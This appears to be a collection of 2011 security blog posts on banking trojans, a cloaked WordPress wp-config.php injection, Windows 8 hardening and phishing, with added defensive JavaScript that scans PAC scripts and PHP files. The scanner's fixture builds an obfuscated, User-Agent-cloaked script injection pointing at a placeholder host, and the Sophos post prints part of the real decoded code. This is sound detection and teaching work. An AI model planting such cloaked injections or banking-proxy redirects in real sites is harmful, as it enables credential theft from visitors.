"This malware may be attempting to copy the technique implemented by Windows malware, which opens a PDF file containing a ".pdf.exe" extension and an accompanying PDF icon. The sample on our hand does not have an extension or an icon yet. However, there is another possibility. It is slightly different in Mac, where the icon is stored in a separate fork that is not readily visible in the OS. The extension and icon could have been lost when the sample was submitted to us. If this is the case, this malware might be even stealthier than in Windows because the sample can use any extension it desires," the analysis by F-Secure said.

Windows-based malware variants have been using the same sort of techniques for hiding themselves for a long time now. They often use common file extensions such as DOC, PDF, XLS and others to entice users into opening the malicious file. In some cases, the malware may not have the proper icon to go along with the fake file extension, as is the case with the Mac OS X Revir.A malware that F-Secure identified. It's a simple trick, but it's still quite effective and users have shown themselves to be willing to open these files, regardless of the potential consequences.

nb : threatpost

20/09/11

Banker – the other way around

There are many techniques used by malware in the banker family to steal users' authentication credentials for online banking sites. We came across an interesting sample recently, detected as Trojan:Win32/Banload.A, which uses a remote proxy script in order to target online banking sites and facilitate data theft.

When Trojan:Win32/Banload.A is executed, it opens an Internet browser to a certain animation site to trick the user into thinking that it’s nothing but an animation file:



However, the cute animation masks the main objective of this trojan, which is to modify the web browser settings to use a Proxy Automatic Configuration script… And once set, that’s it! Mission accomplished! This malware’s job is done, for now…



By using a proxy configuration script, the trojan sets the user’s Internet connection to be routed through a proxy server.

Affected users should note that in the case of Trojan:Win32/Banload.A, because it makes changes to the proxy settings, removing the malware will not be enough to fix an affected computer and return it to a pre-compromised state. The configuration settings will need to be fixed manually. Without changing these settings, while the remote script remains available, the affected computer will still be utilizing it. The script effectively moderates the affected user’s Internet use – possibly providing false information and redirecting the user away from sites of their choice to sites of the attacker’s choice – with the affected user being none the wiser.

MMPC downloaded the Proxy Script from the URL (shown in the above graphic) and found it to be malicious; we detect it as TrojanProxy:JS/Banker.B. It contains code that monitors for online banking sites visited by the affected user, and redirects traffic to a proxy server that could result in the theft of authentication credentials or other sensitive information.
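A PAC script is plain JavaScript exposing FindProxyForURL(url, host), which the browser calls for every request, so a recovered script can be evaluated offline to see which destinations it quietly routes through a proxy. The harness below is an added example, not MMPC's code or the actual TrojanProxy:JS/Banker.B script; the sample PAC, its hostnames and the proxy address are constructed placeholders.

```javascript
// Added example: audit a suspicious Proxy Auto-Configuration (PAC) script by
// evaluating it against URLs of interest in an isolated scope. Nothing here is
// the malware's own script; SAMPLE_PAC is constructed to mirror the behaviour
// described in the post (banking hosts proxied, everything else DIRECT).

// Minimal versions of the helper functions browsers expose to PAC scripts.
const pacHelpers = {
  dnsDomainIs: (host, domain) => host === domain || host.endsWith(domain),
  shExpMatch: (str, pattern) => {
    const escaped = pattern.replace(/[.+^${}()|[\]\\]/g, '\\$&');
    const re = new RegExp('^' + escaped.replace(/\*/g, '.*').replace(/\?/g, '.') + '$', 'i');
    return re.test(str);
  },
  isPlainHostName: (host) => !host.includes('.'),
};

// Constructed sample PAC (placeholder hostnames, RFC 5737 proxy address).
const SAMPLE_PAC = `
function FindProxyForURL(url, host) {
  if (shExpMatch(host, "*.examplebank.example") ||
      dnsDomainIs(host, "online.otherbank.example")) {
    return "PROXY 192.0.2.10:8080";
  }
  return "DIRECT";
}`;

// Compile the PAC source into a function scope that sees only the helpers above,
// so the script cannot reach Node globals while we exercise it.
function loadPac(pacSource) {
  const names = Object.keys(pacHelpers);
  const factory = new Function(...names, pacSource + '\nreturn FindProxyForURL;');
  return factory(...names.map((n) => pacHelpers[n]));
}

// Evaluate the PAC for each URL and return those that are NOT sent DIRECT,
// i.e. the destinations an attacker-controlled proxy would get to see.
function auditPac(pacSource, urls) {
  const findProxy = loadPac(pacSource);
  const findings = [];
  for (const url of urls) {
    const host = new URL(url).hostname;
    const decision = String(findProxy(url, host));
    if (decision.trim().toUpperCase() !== 'DIRECT') {
      findings.push({ url, decision });
    }
  }
  return findings;
}

// Constructed list of URLs to probe: two banking logins and one unrelated site.
const PROBE_URLS = [
  'https://www.examplebank.example/login',
  'https://online.otherbank.example/',
  'https://www.example.com/',
];

console.log(auditPac(SAMPLE_PAC, PROBE_URLS));
```

Running the same harness with a real URL list (the banks your users actually visit) against a PAC recovered from an affected machine shows exactly which sessions were being intercepted.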

In order to change these proxy settings:

1. In Internet Explorer, click the Tools menu, and then click Internet Options.

2. Click the Connections tab, and then click LAN Settings.

3. In the Automatic configuration area, de-select Use automatic configuration script.

4. Click OK.

For more information about using automatic proxy configuration, see the following articles:


SHA1s:
C3D1E6E68CC5241F92F22C07F120487C0AFB03D4
c93c7823c5ba4fe39a91964c8db08f413262719e
0525cbdce83410586a7707c10aea49e87c3f8a19

nb : technet

19/09/11

Troj/PHPShll-B: Malware injects itself into WordPress installations

On Friday, a colleague in our IT department asked about a Mal/Badsrc-C malware detection that had been found by Sophos products on one of their friends' websites.

When I initially downloaded the website it looked clean. However, the automated systems inside SophosLabs were detecting the webpage as being infected with Mal/Badsrc-C.

So, I investigated a little more deeply - repeating the download after setting the User-Agent in my browser to pretend to be Internet Explorer.

This time I saw:
>>> Virus 'Mal/Badsrc-C' found in file index.html

Clearly, the malware on the website was planted in such a way that it would only manifest itself if it believed that the computer visiting the webpage was running Internet Explorer.

When you look at the last line of the index.html file you can see the appended malicious script tag:

Appended malicious script tag

As my colleague knew the affected website's owner, I was able to gain a complete copy of the site which was running an installation of the popular WordPress blogging platform.

Looking at the WordPress configuration file (wp-config.php) I saw a suspicious piece of code prepended:



When this code is run it decodes to some suspicious code:
stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 6")||stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 7")||stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 8")||stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 9")){ return base64_decode("PHNjcmlwdCBzcm...
The above code snippet means that malicious code will only be served if the User-Agent is Internet Explorer. The geekier amongst you will recognise the base64 string as being the beginning of:
<script src
Sophos now detects and disinfects this modified code as Troj/PHPShll-B.
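The injection has a recognisable shape: an eval() of base64-decoded data whose decoded payload checks HTTP_USER_AGENT for MSIE and, only then, returns a second base64 string that decodes to a script tag. The scanner below is an added example, not Sophos' detection logic; the sample wp-config.php is constructed with a placeholder script URL, and the function names are hypothetical.

```javascript
// Added example: scan PHP source for the nested base64 / User-Agent-cloaked
// script injection described in the post. Not Sophos' code.

const b64 = (s) => Buffer.from(s, 'latin1').toString('base64');
const unb64 = (s) => Buffer.from(s, 'base64').toString('latin1');

// Constructed sample wp-config.php: an obfuscated prefix, then normal settings.
// Layer 1 decodes to a function that checks the User-Agent; layer 2 (returned
// only for MSIE) decodes to the <script src=...> tag. The URL is a placeholder.
const innerScript = '<script src="http://malicious.example/x.js"></script>';
const uaCloak =
  'function wp_inject(){ if(stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 6")' +
  '||stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 7")' +
  '||stristr($_SERVER["HTTP_USER_AGENT"],"MSIE 8")' +
  `){ return base64_decode("${b64(innerScript)}"); } return ""; }`;
const SAMPLE_WP_CONFIG =
  `<?php eval(base64_decode("${b64(uaCloak)}")); ?>` +
  "<?php\ndefine('DB_NAME', 'wordpress');\ndefine('DB_USER', 'wp');\n";

// Extract every base64_decode("...") / base64_decode('...') string literal.
function base64Literals(src) {
  const re = /base64_decode\(\s*(["'])([A-Za-z0-9+\/=]+)\1\s*\)/g;
  const out = [];
  let m;
  while ((m = re.exec(src)) !== null) out.push(m[2]);
  return out;
}

// Decode each literal, recurse into the decoded text (bounded depth, since the
// payload nests a second base64 string) and collect the three indicators.
function scanPhp(src, depth = 0, report = null) {
  if (report === null) {
    report = { layers: [], evalOfDecoded: false, uaCloak: false, scriptTag: false };
  }
  if (/eval\s*\(\s*base64_decode/.test(src)) report.evalOfDecoded = true;
  if (/HTTP_USER_AGENT/.test(src) && /MSIE/.test(src)) report.uaCloak = true;
  if (/<script\s+src/i.test(src)) report.scriptTag = true;
  if (depth >= 5) return report;
  for (const literal of base64Literals(src)) {
    const decoded = unb64(literal);
    report.layers.push(decoded);
    scanPhp(decoded, depth + 1, report);
  }
  return report;
}

// All three indicators together match the Troj/PHPShll-B pattern; any one
// alone (e.g. a legitimate base64_decode) is only worth a closer look.
function isSuspicious(report) {
  return report.evalOfDecoded && report.uaCloak && report.scriptTag;
}

console.log(isSuspicious(scanPhp(SAMPLE_WP_CONFIG)), scanPhp(SAMPLE_WP_CONFIG).layers);
```

The innermost encoded layer in the sample begins with the same characters the post shows, PHNjcmlwdCBzcm, because that is simply base64 for the start of a script tag.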

So, what's happened is that somehow malicious code has managed to inject itself into the PHP code used on some websites running WordPress, meaning that if you visit them when running Internet Explorer you could be exposing yourself to a malware attack.

What isn't clear is exactly how the malicious code managed to embed itself on the website, although it was most probably via compromised FTP credentials.

If you run a site which uses WordPress you would be wise to ensure that your passwords are chosen carefully (not dictionary words, and not easy to guess) and that you are not using the same credentials on any other websites. If you think it's possible that your password details may have been stolen - or if you use the same passwords elsewhere on the internet - change them immediately.

Furthermore, you should be regularly auditing the code on your site to ensure that there have not been any unauthorised changes.

Finally, always ensure that your website software is up-to-date and fully patched.
This hack appears to be widespread and website owners need to be vigilant.

nb : nakedsecurity.sophos

Windows 8 to get important security tweaks

'Secured boot' will be the biggest new protection; most of the rest are enhancements from what appeared in Windows 7 and earlier

Windows 8 will ship with a number of small but important security tweaks Microsoft hopes will make it a harder target for the viruses, worms, and Trojans that were able to subvert older versions of the operating system.

Most of the security features mentioned by Windows president Steven Sinofsky at this week's Build conference extend design features that appeared in Vista and Windows 7 and have gradually been added through updates.


These include address space layout randomization (ASLR), which will be used more extensively in Windows 8, as will a new feature that protects the core of the OS from what are called "kernel-mode null dereference vulnerabilities," basically a way for an attacker to elevate privileges once on the system. Windows 8 will also make extensive use of memory heap randomisation, another technique tried on Windows 7, which makes it difficult for malware programmers to overrun the space given to an application for malicious purposes.

Probably the biggest security addition is Windows 8's support for UEFI 2.3.1 secured boot technology (which requires BIOS support), which stops early-booting malware from interfering with antivirus products before they load into memory.

None of these changes are particularly radical, but they continue the design policy of restricting as far as possible what applications can do on the platform without upsetting the OS. Of course, in the Web 2.0 world, what an application can do is increasingly governed by software interfaces other than those looked after by the OS.

Sinofsky did remind developers of the importance of the company's security development life cycle (SDL), the coding, testing, and design system it came up with to avoid the security oversights that caused so many problems for Windows XP a decade ago. "Some malware is as complex as commercial applications," Sinofsky noted in a blog post on the environment in which Windows 8 will be operating.

Microsoft has also spotted an interesting clue as to why a sizable minority of PCs seem to lack adequate antivirus protection: People use free antivirus that comes with a new PC but then fail to subscribe after trial periods expire.

"Shortly after Windows 7 general availability in October 2009, our telemetry data showed nearly all Windows 7 PCs had up-to-date antimalware software," said Sinofsky. "A year later, at least 24 percent of Windows 7 PCs did not have current antimalware protection. Our data also shows that PCs that become unprotected tend to stay in this unprotected state for long periods of time."

Microsoft's biggest security challenge with Windows 8 remains the same one the company had with Windows 7: a core of stubborn users refuses to upgrade from older operating systems, especially XP. This, critics might point out, is largely Microsoft's fault for shipping five versions of the operating system since the year 2000, a marketing approach that left some users unsure as to the value of paying for a new version.

nb : infoworld

16/09/11

SpyEye Trojan stole $3.2 million from U.S. victims

The amounts stolen and the number of large organizations potentially impacted is cause for serious concern, says Trend Micro

A Russian cybergang headed by a mysterious ringleader called 'Soldier' was able to steal $3.2 million from U.S. citizens earlier this year using the SpyEye-Zeus data-stealing Trojan, security company Trend Micro has reported.

Over a six-month period from January 2011, Trend found that the Soldier gang had been able to compromise a cross-section of U.S. businesses, including banks, airports, research institutions, and even the U.S. military and Government, as well as ordinary citizens.


A total of 25,394 systems were infected between 19 April and 29 June alone, 57 percent of which were Windows XP systems with even Windows 7 registering 4,500 victim systems.

The company has not explained how the sum of $3.2 million was taken, nor from which types of user, but accounts across a wide range of applications were found to have been compromised. The three largest by some margin were Facebook, Yahoo and Google, but eBay, Amazon, PayPal, and Skype also appear on the list.

"'Soldier' has mainly targeted U.S. users and to increase the number of successful infections achieved in the U.S., he even bought U.S. traffic from other cybercriminals. Besides using malware to steal money from the compromised accounts, he also steals user security credentials," Trend Micro said.

"Compromise on such a mass scale is not that unusual for criminals using toolkits like SpyEye, but the amounts stolen and the number of large organizations potentially impacted is cause for serious concern."

Banking Trojans such as SpyEye and the older Zeus (possibly now merged with SpyEye) have been one of the malware stories of the last year, and have featured in a number of high-profile online crime cases.

In the U.K. this included a teen gang said to have stolen as much as £12 million ($18 million) from a range of activities including online bank fraud. Earlier in 2010, a separate gang using Zeus was able to steal up to £20 million ($30 million), police believe.

nb : infoworld

15/09/11

Trojan targets Japanese bank customers through spam

Recent malware trends clearly show that financial gain is one of the top reasons to be on the dark side of the Internet. Countless threats targeting banking information come and go each day. Stealing banking information is now easier than ever with the availability of toolkits such as Spyeye and Zbot that allow malware authors to target banks of their choice. It is believed that trillions of dollars are deposited in Japanese banks.

Furthermore, the Japanese nation is well known to be a nation of savers, thus making Japanese banks and their customers a potentially lucrative target.

A recent spam attack targeting customers of a leading bank in Japan arrives with an .exe file attachment named with the abbreviation of the bank. When we first observed this attack, we thought that it was a typical spam attack customized through Spyeye. However, on closer inspection, we found that this was not the case. It is, in fact, Infostealer.Jginko.

The email appears legitimate except for the sender portion of the bank’s name in the email id, which clearly demonstrates that the email did not come from the bank, as the domain in this case is not valid; it is just "co.jp". This is a second-level domain and not a fully qualified domain name. The email asks the recipients to renew a "code card". The code card is a card that is provided by the bank to its customers. It contains a matrix of numbers that is used to finalize online transactions (TAN). This is a type of two-factor protection that is used to help protect against straightforward unauthorized account access or transactions. Two-factor protection is widely used by online banking systems, and in some cases three-factor authentication is used. To renew the code card as requested by the email, the recipient is asked to open the attachment.

Running the attachment displays a form which the user is requested to fill in. When the form is filled in and the send button is clicked, the threat takes a screenshot and sends it to the IP address of 66.90.100.214 using a predefined user name and password. At the time of investigation, we did not see any screenshots at the remote location. This may indicate that few users are affected by the threat or that the attacker is copying and deleting data on a regular basis.

Social engineering attacks such as this one are effective against users with little security knowledge. The affected bank has posted a message on their website warning users of these types of spam attacks.

nb : symantec